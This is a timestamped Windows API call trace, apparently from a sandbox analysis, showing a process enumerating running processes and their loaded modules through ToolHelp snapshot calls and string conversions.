	[0102.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 13
	[0102.842] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\napinsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\napinsp.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="napinsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="napinsp.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.843] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\pnrpnsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\pnrpnsp.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pnrpnsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pnrpnsp.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.844] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\NLAapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\NLAapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NLAapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NLAapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.845] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\winrnr.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\winrnr.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="winrnr.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winrnr.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.846] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.847] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.862] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.863] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 0
	[0102.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17
	[0102.864] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0102.865] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x4) returned 0xffffffff
	[0102.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7
	[0102.867] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0102.868] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfc) returned 0xffffffff
	[0102.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9
	[0102.870] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0102.871] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x144) returned 0xffffffff
	[0102.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10
	[0102.873] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0102.874] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x18c) returned 0xffffffff
	[0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.876] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0102.877] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x198) returned 0xffffffff
	[0102.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10
	[0102.879] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0102.880] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x1cc) returned 0xffffffff
	[0102.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13
	[0102.882] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0102.883] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x1f0) returned 0xffffffff
	[0102.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13
	[0102.885] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0102.886] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x1f8) returned 0xffffffff
	[0102.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10
	[0102.888] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.889] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x248) returned 0xffffffff
	[0102.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.891] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.892] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x268) returned 0xffffffff
	[0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.894] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0102.899] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x2cc) returned 0xffffffff
	[0102.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8
	[0102.915] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.916] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x324) returned 0xffffffff
	[0102.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.918] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.919] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x34c) returned 0xffffffff
	[0102.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.921] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.922] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x35c) returned 0xffffffff
	[0102.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.924] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.925] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x3a0) returned 0xffffffff
	[0102.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.927] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.928] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x3c0) returned 0xffffffff
	[0102.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.930] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.931] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x3d4) returned 0xffffffff
	[0102.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.933] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.934] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xe4) returned 0xffffffff
	[0102.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.942] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0102.943] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x460) returned 0xffffffff
	[0102.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.945] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0102.946] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x50c) returned 0xffffffff
	[0102.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11
	[0102.948] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.949] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x600) returned 0xffffffff
	[0102.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.951] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0102.952] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x650) returned 0xffffffff
	[0102.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21
	[0102.976] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0102.977] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x6e4) returned 0xffffffff
	[0102.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18
	[0102.981] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0102.983] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x6d4) returned 0xffffffff
	[0102.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12
	[0102.985] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0102.986] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x700) returned 0xffffffff
	[0102.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14
	[0102.988] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0102.989] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x84c) returned 0xffffffff
	[0102.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13
	[0102.994] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0102.995] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x894) returned 0x83c
	[0105.151] Module32FirstW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.152] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.152] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.153] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.154] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.155] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.156] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.157] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.158] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.159] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.159] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.160] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.161] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.162] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.162] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.163] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.164] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.165] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.166] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.167] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.168] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.169] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.170] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.186] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.187] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.188] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.189] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
